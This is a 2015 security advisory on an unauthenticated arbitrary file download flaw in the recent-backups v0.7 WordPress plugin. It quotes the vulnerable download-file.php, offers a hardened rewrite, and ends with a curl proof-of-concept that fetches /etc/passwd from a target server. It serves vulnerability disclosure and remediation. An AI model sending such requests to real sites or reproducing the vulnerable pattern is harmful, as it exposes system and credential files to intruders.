Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in download-file.php neither verifies that the requester is logged in nor restricts which file can be downloaded: the file_link
parameter is passed unchanged to file_exists() and readfile(), so an absolute path works directly and no traversal sequence is needed. The
basename() call only affects the suggested filename in the Content-Disposition header; it does not limit what is read. The script is
reachable directly under wp-content/plugins/ and does not load WordPress, so no authentication or nonce check runs at all. This can be used
to download sensitive system files:
  <?php
  // Vulnerable as shipped in v0.7: attacker-controlled path, no auth, no confinement.
  $file = $_GET['file_link'];

  if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    // basename() here only shapes the download name; the full path is still read below.
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);   // returns the raw contents of whatever path was supplied
  }
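The following is a hardened rewrite of download-file.php, added here as an illustration; it is not the plugin author's code and not a vendor patch. It assumes the script is still hit directly (so it bootstraps WordPress via wp-load.php to get the auth and nonce functions), that the dashboard widget builds its links with wp_nonce_url(..., 'rb_download'), and that backups live under a hypothetical RB_BACKUP_DIR (the real directory is whatever BackupWordPress is configured to use). The function name rb_safe_backup_path and the nonce action are likewise assumptions.

```php
<?php
// Added example (hardened download-file.php), not the plugin's own code.
// Assumption: this file is reached directly, so WordPress must be loaded here.
require_once dirname(__FILE__) . '/../../../wp-load.php';

// Assumption: backup directory location (hypothetical constant, see lead-in).
define('RB_BACKUP_DIR', WP_CONTENT_DIR . '/backups');

/**
 * Resolve $name to a regular file inside $dir, or return null.
 * Only a bare file name is accepted: no slashes, no "..", no NUL bytes, no
 * dotfiles, and the resolved real path must stay under the real path of $dir,
 * which also defeats symlinks planted inside the backup directory.
 */
function rb_safe_backup_path($dir, $name) {
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    if ($name !== basename($name)) {   // rejects "../x" and "/etc/passwd"
        return null;
    }
    if ($name[0] === '.') {            // rejects ".htaccess" and friends
        return null;
    }
    $base = realpath($dir);
    $full = realpath($dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    // Prefix check on canonical paths: $full must be strictly below $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// 1. Authentication and authorization: only administrators may pull backups.
if (!is_user_logged_in() || !current_user_can('manage_options')) {
    wp_die('Forbidden', '', array('response' => 403));
}

// 2. CSRF: the widget link must carry a nonce for the assumed 'rb_download' action.
if (!isset($_GET['_wpnonce']) || !wp_verify_nonce($_GET['_wpnonce'], 'rb_download')) {
    wp_die('Bad nonce', '', array('response' => 403));
}

// 3. Path confinement: file_link is a bare name, resolved inside RB_BACKUP_DIR only.
$file = isset($_GET['file_link'])
    ? rb_safe_backup_path(RB_BACKUP_DIR, wp_unslash($_GET['file_link']))
    : null;
if ($file === null) {
    wp_die('Not found', '', array('response' => 404));
}

header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
header('Cache-Control: private, no-store');
readfile($file);
exit;
```

The order matters: the authorization and nonce checks run before any filesystem call, so an unauthenticated request cannot even probe for the existence of a file, and the realpath() prefix comparison is done on canonical paths rather than on the raw parameter, so symlinks and encoding tricks are resolved before the decision is made.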
CVEID:
OSVDB: 124792
Exploit Code:
 $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd"
Published on Exploit-DB as EDB-ID 37752 (https://www.exploit-db.com/exploits/37752/), 2015-08-10; OSVDB 124792.